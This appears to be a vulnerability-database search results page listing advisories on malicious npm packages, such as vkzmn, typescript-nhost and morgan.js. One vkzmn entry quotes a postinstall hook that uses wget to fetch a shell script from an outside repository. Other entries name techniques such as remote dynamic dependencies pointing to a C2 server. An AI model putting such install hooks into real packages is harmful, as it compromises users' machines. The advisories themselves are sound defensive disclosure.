Lucene search
K

74 matches found

OSV
OSV
added 2 days ago4 views

MAL-2026-10282 Malicious code in acidic (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8ef3583eb4d5b190d763cd784f5a40cb2cddaa8f1b6cd81b8a663bb612b51bb7 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

6.1AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2 days ago3 views

Malicious code in sixseven4 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1dfd6ff82b27df8c8ecd3520e70b720e0ff6e6f4443e21d1230acebdfd032b6d The package declares no install/postinstall/preinstall lifecycle scripts, and its declared main is sw.js — a browser ServiceWorker that uses...

6.2AI score
Exploits0References4
OSV
OSV
added 2026/06/29 10:49 a.m.15 views

MAL-2026-6594 Malicious code in vkzmn (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dc2e10775ac70e6f3b083ac0a76374e09e11cac7b06068a4bd3b6114f796a0df package.json declares a postinstall lifecycle hook that runs wget https://codeberg.org/atilalogical/wormteste/raw/branch/main/downprocwork.sh -O d.sh...

6.2AI score
Exploits0References10
OSV
OSV
added 2026/06/26 5:17 a.m.6 views

MAL-2026-6508 Malicious code in tw-style-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fc430da42cdbbb83b681be645a2bbc3f3f2a48e0e19d9d3624b4b3e6f9aa7e92 [email protected] was scanned and produced no findings indicative of supply-chain attack behavior. No install-time lifecycle scripts performing...

6.1AI score
Exploits0References3
OSV
OSV
added 2026/06/17 5:6 a.m.7 views

MAL-2026-6039 Malicious code in @mastra/temporal (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 214be711b41a8883e3252f0e9e41bc902d62da7650334b2efdc7424194989101 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

6.1AI score
Exploits0References2
OSV
OSV
added 2026/04/15 2:57 p.m.10 views

MAL-2026-2691 Malicious code in base-counter-web (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0d62a2050cc5eeb2ef06d0fc82867045f7b3d45cb4285dee67a182482ec29fb7 The package base-counter-web was found to contain malicious code. Source: ghsa-malware a14be5d8c05cd4abe5d7c7cc81e7da406ff18dfed1f6b64d1eb731c9344b4e...

5.7AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/03/27 12:51 a.m.8 views

Malicious code in shop-republik-ch (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector da3fe1a756db5b61e6883fb43ab2f27fd56333e302ad597c4bb9f1743b1f19b6 The package shop-republik-ch was found to contain malicious code. Source: ghsa-malware b68c5977e45306e58eda4d2345cb1ac0eba178c179064471f3327a30915e6d...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/03/20 4:36 a.m.12 views

Malicious code in trex-proxy-browser-extension-sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9eb36a59a719cff949c203a03a41c54b637bb1974bdea728b1bc15e837a7db45 The package trex-proxy-browser-extension-sdk was found to contain malicious code. Source: ghsa-malware...

5.7AI score
Exploits0References1
OSV
OSV
added 2026/03/16 12:0 a.m.4 views

MAL-2026-1552 Malicious code in typescript-nhost (npm)

The package 'typescript-nhost' is part of the PhantomRaven supply chain attack campaign Wave 2. It uses a Remote Dynamic Dependency RDD technique: the published package appears benign but includes a URL-based dependency in package.json pointing to an attacker-controlled C2 server...

5.6AI score
Exploits0References3
OSV
OSV
added 2026/03/13 6:47 a.m.3 views

MAL-2026-1398 Malicious code in meta-internal-logger-drzak (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1483f98fd78866cc6a27d31d99659bbb2912ec70d8771a004837f6fa46661a78 The package meta-internal-logger-drzak was found to contain malicious code. Source: ghsa-malware...

5.7AI score
Exploits0References1
OSV
OSV
added 2026/03/13 6:47 a.m.3 views

MAL-2026-1394 Malicious code in dell-emc-internal-api-drzak (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 79b1c68a3106c50c73d1ede904d8c6fe7b41466a0e619e50c0935a7988293740 The package dell-emc-internal-api-drzak was found to contain malicious code. Source: ghsa-malware...

5.7AI score
Exploits0References1
OSV
OSV
added 2026/01/27 8:11 a.m.4 views

MAL-2026-536 Malicious code in morgan.js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 34775085e6638773de4ccac41092ae9954c9889f2c2a7bcd7cb7909375b53c4c The package morgan.js was found to contain malicious code. Source: ghsa-malware 6d6ee3da39907b410bc3a7d0baf6736a9c9c2f1c770a6e749c5ad2119c848d9f Any...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2025/12/30 4:12 p.m.9 views

Malicious code in rt-interactive-card-collection (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9858817ec5f5e5af9db5f5033c3626e4214faa07e1169e950573bbca309a975e The package rt-interactive-card-collection was found to contain malicious code. Source: ghsa-malware...

6.9AI score
Exploits0References1
OSV
OSV
added 2025/12/19 8:44 a.m.3 views

MAL-2025-192622 Malicious code in chai-as-awaited (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0e469d359c2a3a5ca20b47691e64d2330d38d9ad0f173fb440b2ac677d333d6a The package chai-as-awaited was found to contain malicious code. Source: ghsa-malware df0ec4507c7a16056091fbf705d97408c308041bf9b5798d113fdc3042a00b3...

6.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2025/12/04 7:15 a.m.6 views

Malicious code in elf-stats-candlelit-marshmallow-663 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e8cf5bd84066a57d6f168967adc62dd26c49c4095817e6db922dc357f63f824e The package elf-stats-candlelit-marshmallow-663 was found to contain malicious code. Source: ghsa-malware...

6.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2025/11/25 12:7 a.m.8 views

Malicious code in @browserbasehq/director-ai (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b86bd8a3bb8b027a0b305fca0e5616b1f8cfee1229e47609ef43a14edb2ad0c6 The package @browserbasehq/director-ai was found to contain malicious code. Source: ghsa-malware...

6.9AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packages
added 2025/11/24 1:43 p.m.8 views

Malicious code in iron-shield-miniapp (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6a7b0e4007bb817da7fd19c6ddd7f073f585337504d8ac60541b07e162398b70 The package iron-shield-miniapp was found to contain malicious code. Source: ghsa-malware...

6.9AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packages
added 2025/11/24 12:35 p.m.6 views

Malicious code in @ensdomains/address-encoder (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ec8264ecb2af0b5028f08af1a108f7fe73cd1cbe55ea2cb7102a3e28b2e1052e The package @ensdomains/address-encoder was found to contain malicious code. Source: ghsa-malware...

6.9AI score
Exploits0References4
OSV
OSV
added 2025/11/10 5:52 a.m.2 views

MAL-2025-55017 Malicious code in @mts-ds/icons (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0112c17ea22a1384f1973813b785859e61805e29b2027b835dfa81c022bd846e The package @mts-ds/icons was found to contain malicious code. Source: ghsa-malware b51afa604dd61e1408dc95f628c00b6b379d7191214d2b77258a2a97f0cb38e4...

6.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2025/10/29 10:49 p.m.6 views

Malicious code in @aio-commerce-sdk/config-typescript (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 85b2c7fad2af3e611f7fe4d8399529e1b897e4ca8838e1a5db0a2c61acb4d998 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

6.8AI score
Exploits0References2
Rows per page
Query Builder